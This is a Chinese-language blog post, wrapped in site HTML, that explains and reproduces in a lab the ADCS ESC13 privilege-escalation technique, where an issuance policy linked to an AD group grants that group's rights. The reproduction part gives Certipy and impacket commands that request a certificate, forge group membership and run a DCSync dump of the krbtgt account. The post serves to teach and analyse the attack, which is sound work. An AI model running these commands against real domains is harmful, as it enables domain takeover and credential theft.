<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="本文首发于先知社区：https:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;13864 0x1 起因：​       自 Will Schroeder（@harmj0y）和 Lee Christensen（@tifkin_）在 2021 年的 BlackHat 大会上发布白皮书以来，ADCS的攻击面首次系统化的进入人们的视野。Certified Pre-Owned - Abusing Active Dir">
<meta property="og:type" content="article">
<meta property="og:title" content="滥用ADCS进行权限提升——ESC13详解">
<meta property="og:url" content="https://cer3s-k.github.io/post/48e6280e.html">
<meta property="og:site_name" content="Cer3sの博客">
<meta property="og:description" content="本文首发于先知社区：https:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;13864 0x1 起因：​       自 Will Schroeder（@harmj0y）和 Lee Christensen（@tifkin_）在 2021 年的 BlackHat 大会上发布白皮书以来，ADCS的攻击面首次系统化的进入人们的视野。Certified Pre-Owned - Abusing Active Dir">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144636132.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144648367.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144656542.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144703128.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144710141.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144715770.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144720831.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144727176.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144738676.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144751089.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144756431.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144802852.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144806915.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144812103.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144817366.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144824808.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144832095.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144859596.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144908853.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144914080.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144920658.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144925847.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144931174.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144936230.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144955762.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145000881.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145005809.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145011317.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145015729.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145020565.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145026443.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145031926.png">
<meta property="og:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302145036415.png">
<meta property="article:published_time" content="2024-03-02T06:23:30.000Z">
<meta property="article:modified_time" content="2024-09-22T11:00:30.242Z">
<meta property="article:author" content="Cer3s">
<meta property="article:tag" content="ADCS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cer3s-k.github.io/post/48e6280e/image-20240302144636132.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>滥用ADCS进行权限提升——ESC13详解</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/Cer3s-k">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇" href="/post/db27253d.html"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://cer3s-k.github.io/post/48e6280e.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://cer3s-k.github.io/post/48e6280e.html&text=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://cer3s-k.github.io/post/48e6280e.html&is_video=false&description=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=滥用ADCS进行权限提升——ESC13详解&body=Check out this article: https://cer3s-k.github.io/post/48e6280e.html"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://cer3s-k.github.io/post/48e6280e.html&name=滥用ADCS进行权限提升——ESC13详解&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://cer3s-k.github.io/post/48e6280e.html&t=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-%E8%B5%B7%E5%9B%A0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">0x1 起因：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-%E5%88%86%E6%9E%90%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">0x2 分析：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E7%AD%96%E7%95%A5"><span class="toc-number">2.1.</span> <span class="toc-text">证书颁发策略</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#OID%E7%BB%84%E9%93%BE%E6%8E%A5"><span class="toc-number">2.2.</span> <span class="toc-text">OID组链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81%EF%BC%9A"><span class="toc-number">2.3.</span> <span class="toc-text">证书认证：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">0x3 漏洞复现：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">3.1.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">0x4 总结：</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        滥用ADCS进行权限提升——ESC13详解
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Cer3s</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-03-02T06:23:30.000Z" class="dt-published" itemprop="datePublished">2024-03-02</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/AD%E5%9F%9F/">AD域</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ADCS/" rel="tag">ADCS</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>本文首发于先知社区：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/13864">https://xz.aliyun.com/t/13864</a></p>
<h2 id="0x1-起因："><a href="#0x1-起因：" class="headerlink" title="0x1 起因："></a>0x1 起因：</h2><p>​       自 Will Schroeder（<a target="_blank" rel="noopener" href="https://twitter.com/harmj0y">@harmj0y</a>）和 Lee Christensen（<a target="_blank" rel="noopener" href="https://twitter.com/tifkin_">@tifkin_</a>）在 2021 年的 BlackHat 大会上发布白皮书以来，ADCS的攻击面首次系统化的进入人们的视野。<a target="_blank" rel="noopener" href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">Certified Pre-Owned - Abusing Active Directory Certificate Services</a>这本白皮书可以说是为ADCS的利用奠定了各种理论基础。<br>​       随着ADCS的利用越加广泛，各种工具层出不穷，其中Certipy更是其中的佼佼者，近日在学习Certipy的相关代码实现的时候，偶然发现了这样一条PR</p>
<img src="/post/48e6280e/image-20240302144636132.png" class="" title="image-20240302144636132">
<p>众所周知（应该），在白皮书中一共介绍了ESC1-ESC8这8种ESC命名的攻击手法，后续又补充了<a target="_blank" rel="noopener" href="https://medium.com/u/cd3a881c1abc?source=post_page-----fda4272fbd53--------------------------------">Oliver Lyak</a>提出的<a target="_blank" rel="noopener" href="https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7">ESC9和ESC10</a>、 <a target="_blank" rel="noopener" href="https://twitter.com/sploutchy">Sylvain Heiniger</a>提出的中继到RPC的 <a target="_blank" rel="noopener" href="https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/">ESC11</a>和利用条件比较局限的的<a target="_blank" rel="noopener" href="https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm">ESC12</a>，针对这条PR附带的<a target="_blank" rel="noopener" href="https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53">博客文章</a>，我尝试对这个ESC13进行分析和复现。</p>
<h2 id="0x2-分析："><a href="#0x2-分析：" class="headerlink" title="0x2 分析："></a>0x2 分析：</h2><p>​       首先，先上结论：正如标题，这不是一个可以和ESC1或者ESC8一样可以直接获取域内权限的致命漏洞，它只能算是一个域内权限提升漏洞，提升的权限取决于你错误配置指向的组的权限，且它的限制颇多。<br>   说的详细一点的话就是，我们可以使用指向给定 AD 组的 OID 组链接的颁发策略来配置证书模板。当我们用这个模板申请证书成功之后，我们利用该证书进行身份验证就可以获取这个组的权限，哪怕我们的用户不在这个组里。</p>
<p>这里面涉及到三个关键：</p>
<ul>
<li>颁发策略</li>
<li>指向AD组的OID组链接</li>
<li>使用证书认证</li>
</ul>
<p>我们对此进行逐步分析</p>
<h3 id="证书颁发策略"><a href="#证书颁发策略" class="headerlink" title="证书颁发策略"></a>证书颁发策略</h3><p>证书颁发策略是指用于控制证书颁发的一组规则和条件。颁发策略定义了在何种情况下、以何种方式以及向谁颁发证书。<br>我们可以打开一个证书模板查看其拓展，可以看到是包括了颁发策略这一部分的，而且当前模板默认是没有值</p>
<img src="/post/48e6280e/image-20240302144648367.png" class="" title="image-20240302144648367">
<p>我们可以点击编辑添加颁发策略，也可以新建我们自己的颁发策略</p>
<img src="/post/48e6280e/image-20240302144656542.png" class="" title="image-20240302144656542">
<p>证书的颁发策略同样是用OID进行标志的，它存储在LDAP中的CN&#x3D;OID,CN&#x3D;Public Key Services,CN&#x3D;Services,CN&#x3D;Configuration,DC&#x3D;esg-red,DC&#x3D;local中，每一个CN代表一个OID对象</p>
<img src="/post/48e6280e/image-20240302144703128.png" class="" title="image-20240302144703128">
<p>同样我们也可以通过powershell来查看</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-ADObject</span> <span class="literal">-Filter</span> * <span class="literal">-SearchBase</span> <span class="string">&quot;CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=esg-red,DC=local&quot;</span> <span class="literal">-Properties</span> DisplayName,msPKI<span class="literal">-Cert-Template-OID</span></span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302144710141.png" class="" title="image-20240302144710141">
<p>注意，上面存储的OID是ADCS中所有的OID，而证书模板具有的颁发策略的OID则存储在证书模板中的msPKI-Certificate-Policy属性中</p>
<img src="/post/48e6280e/image-20240302144715770.png" class="" title="image-20240302144715770">

<h3 id="OID组链接"><a href="#OID组链接" class="headerlink" title="OID组链接"></a>OID组链接</h3><p>对应CN&#x3D;OID这个容器，我们可以看到它是一个<code>msPKI-Enterprise-Oid</code>类，而对于这个类，它存在一个继承 的<code>msDS-OIDToGroupLink</code>属性</p>
<img src="/post/48e6280e/image-20240302144720831.png" class="" title="image-20240302144720831"><img src="/post/48e6280e/image-20240302144727176.png" class="" title="image-20240302144727176">
<p><code>msDS-OIDToGroupLink</code>这个属性便是ESC13的关键，它标识了与该 OID 表示的发布策略对应的组对象。换句话说，我们可以利用这个属性将我们的颁发策略和相应的AD组链接起来，如果用户利用带有相关颁发策略的证书进行身份验证，那么系统将认为该用户作为AD组的成员（用户不在该组中)，并授予相应的权限。</p>
<img src="/post/48e6280e/image-20240302144738676.png" class="" title="image-20240302144738676">
<p>但是并不是任何组都可以被颁发策略链接的，它需要满足以下要求</p>
<ol>
<li>必须是AD的通用组</li>
<li>组内没有任何成员</li>
</ol>
<p>当我们设置了<code>msDS-OIDToGroupLink</code>属性后，尝试向这个组内添加成员会报错</p>
<img src="/post/48e6280e/image-20240302144751089.png" class="" title="image-20240302144751089">

<h3 id="证书认证："><a href="#证书认证：" class="headerlink" title="证书认证："></a>证书认证：</h3><p>前面说到，这是利用证书颁发策略的<code>msDS-OIDToGroupLink</code>属性导致的权限滥用，所以我们必须要使用证书进行身份验证才行，也就是说我们的证书模板要支持证书认证。<br>我们可以验证一下，我们为ESCUser13用户申请具有漏洞的ESC13模板证书，我们利用Rubeus申请TGT票据，并利用krbtgt的密钥解密查看PAC部分</p>
<img src="/post/48e6280e/image-20240302144756431.png" class="" title="image-20240302144756431">
<p>我们可以看到ESC13User除了默认的513User组外，没有加入任何其他组</p>
<img src="/post/48e6280e/image-20240302144802852.png" class="" title="image-20240302144802852">
<p>但是在我们查看票据的PAC的时候，可以看到它拥有着ESC13Group这个组的权限</p>
<img src="/post/48e6280e/image-20240302144806915.png" class="" title="image-20240302144806915">
<img src="/post/48e6280e/image-20240302144812103.png" class="" title="image-20240302144812103">
<p>而我们利用正常账号密码申请票据，发现只有一个513User组</p>
<img src="/post/48e6280e/image-20240302144817366.png" class="" title="image-20240302144817366">
<img src="/post/48e6280e/image-20240302144824808.png" class="" title="image-20240302144824808">

<h2 id="0x3-漏洞复现："><a href="#0x3-漏洞复现：" class="headerlink" title="0x3 漏洞复现："></a>0x3 漏洞复现：</h2><h3 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h3><p>搭建域控和ADCS的步骤这里不再赘述了<br>域控：DC Windows server 2019 Datacenter 10.10.10.128<br>ADCS：ADCS Windows server 2019 Datacenter 10.10.10.131<br>域名：esg-red.local<br>CA名：esg-red-ADCS-CA<br>首先我们新建一个普通用户，确保它没有加入任何其他组</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-ADUser</span> ESC13User <span class="literal">-Properties</span> MemberOf</span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302144832095.png" class="" title="image-20240302144832095">
<p>然后创建一个通用组，组内没有任何用户</p>
<img src="/post/48e6280e/image-20240302144859596.png" class="" title="image-20240302144859596">
<img src="/post/48e6280e/image-20240302144908853.png" class="" title="image-20240302144908853">
<p>为了验证权限，我们为这个组设置对域内DCSync的权限</p>
<img src="/post/48e6280e/image-20240302144914080.png" class="" title="image-20240302144914080">
<p>接着我们来到我们的ADCS，在终端中输入<code>certsrv.msc</code>打开我们的证书颁发机构，在证书模板这里右键管理打开证书模板控制台，我们可以直接复制现有的模板来创建新的漏洞模板。我们右键工作组身份验证选择复制模板，修改模板名称，在拓展这里双击颁发策略，点击添加</p>
<img src="/post/48e6280e/image-20240302144920658.png" class="" title="image-20240302144920658">
<p>我们可以选择现有的颁发策略，也可以直接新建颁发策略，新建时填写名称就行了</p>
<img src="/post/48e6280e/image-20240302144925847.png" class="" title="image-20240302144925847">
<p>在填完完成之后，点击拓展里的颁发策略，下面会显示已有的策略</p>
<img src="/post/48e6280e/image-20240302144931174.png" class="" title="image-20240302144931174">
<p>我们需要给予用户对证书的申请权限</p>
<img src="/post/48e6280e/image-20240302144936230.png" class="" title="image-20240302144936230">
<p>同时还有一个非常重要的一点，我们需要在使用者名称这里，将DNS名修改为用户主体名称(UPN)，因为我们新建的用户是没有dNSHostName这个属性的，不更改的话会导致证书申请失败</p>
<img src="/post/48e6280e/image-20240302144955762.png" class="" title="image-20240302144955762">
<p>我们在终端中输入<code>adsiedit.msc</code>打开ADSI编辑器，然后连接AD的Configuration</p>
<img src="/post/48e6280e/image-20240302145000881.png" class="" title="image-20240302145000881">
<p>找到我们的OID容器，在<code>CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=esg-red,DC=local</code>下，找到我们创建的颁发策略，修改其<code>msDS-OIDToGroupLink</code>属性为我们创建的通用组</p>
<img src="/post/48e6280e/image-20240302145005809.png" class="" title="image-20240302145005809">

<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>我们找到支持ESC13的<a target="_blank" rel="noopener" href="https://github.com/sploutchy/Certipy/tree/main">分支</a>下载下来，进入主目录，利用find进行简单的信息收集<br>可以看到，成功的扫描出了ESC13这个漏洞</p>
<img src="/post/48e6280e/image-20240302145011317.png" class="" title="image-20240302145011317">
<p>然后我们申请pfx证书</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python entry.py req <span class="literal">-u</span> <span class="string">&#x27;ESC13User@esg-red.local&#x27;</span> <span class="literal">-p</span> <span class="string">&#x27;Admin13&#x27;</span> <span class="literal">-template</span> <span class="string">&#x27;ESC13&#x27;</span>  <span class="literal">-target</span> adcs.esg<span class="literal">-red</span>.local  <span class="literal">-ca</span> esg<span class="literal">-red-ADCS-CA</span></span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302145015729.png" class="" title="image-20240302145015729">
<p>我们利用申请的证书使用申请kirbi类型的票据并将其转化为Linux上使用的ccache类型</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python entry.py auth <span class="literal">-pfx</span> esc13user.pfx <span class="literal">-dc-ip</span> <span class="number">10.10</span>.<span class="number">10.128</span> <span class="literal">-kirbi</span></span><br><span class="line">impacket<span class="literal">-ticketConverter</span> esc13user.kirbi esc13user.ccache</span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302145020565.png" class="" title="image-20240302145020565">
<p>我们利用impacket分支的<a target="_blank" rel="noopener" href="https://github.com/ThePorgs/impacket/blob/7a0ec36036b9b3339a7a72290f33c243a5e4f0b9/examples/describeTicket.py#L4">describeTicket.py</a>脚本解密查看，可以看到确实是存在2616这个组的权限</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python aaa.py esc13user.ccache <span class="literal">--aes</span> <span class="number">3</span>c4f06f1b46e0d5d30fe428ce08921964cae205def01fcf3b643dacf40a27983</span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302145026443.png" class="" title="image-20240302145026443">
<p>导入票据</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=esc13user.ccache</span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302145031926.png" class="" title="image-20240302145031926">
<p>尝试DCSync攻击</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket<span class="literal">-secretsdump</span> esg<span class="literal">-red</span>.local/ESC13User@DC.esg<span class="literal">-red</span>.local  <span class="literal">-k</span> <span class="literal">-no-pass</span> <span class="literal">-just-dc-user</span> <span class="string">&#x27;krbtgt&#x27;</span> <span class="literal">-debug</span></span><br></pre></td></tr></table></figure>

<img src="/post/48e6280e/image-20240302145036415.png" class="" title="image-20240302145036415">

<h2 id="0x4-总结："><a href="#0x4-总结：" class="headerlink" title="0x4 总结："></a>0x4 总结：</h2><p>感觉这个利用属于是”可遇而不可求“，感觉利用限制很多，而且获取的还不一定是高权限组的权限，不过我们可以配合其他漏洞，例如ESC5来修改PKI的ACL等。本篇文章只是暂时分析了一下成因及其简单利用，后续有其他利用姿势欢迎大佬补充，文章有什么错误也欢迎大佬斧正。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/Cer3s-k">项目</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-%E8%B5%B7%E5%9B%A0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">0x1 起因：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-%E5%88%86%E6%9E%90%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">0x2 分析：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E7%AD%96%E7%95%A5"><span class="toc-number">2.1.</span> <span class="toc-text">证书颁发策略</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#OID%E7%BB%84%E9%93%BE%E6%8E%A5"><span class="toc-number">2.2.</span> <span class="toc-text">OID组链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81%EF%BC%9A"><span class="toc-number">2.3.</span> <span class="toc-text">证书认证：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">0x3 漏洞复现：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">3.1.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">0x4 总结：</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://cer3s-k.github.io/post/48e6280e.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://cer3s-k.github.io/post/48e6280e.html&text=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://cer3s-k.github.io/post/48e6280e.html&is_video=false&description=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=滥用ADCS进行权限提升——ESC13详解&body=Check out this article: https://cer3s-k.github.io/post/48e6280e.html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://cer3s-k.github.io/post/48e6280e.html&title=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
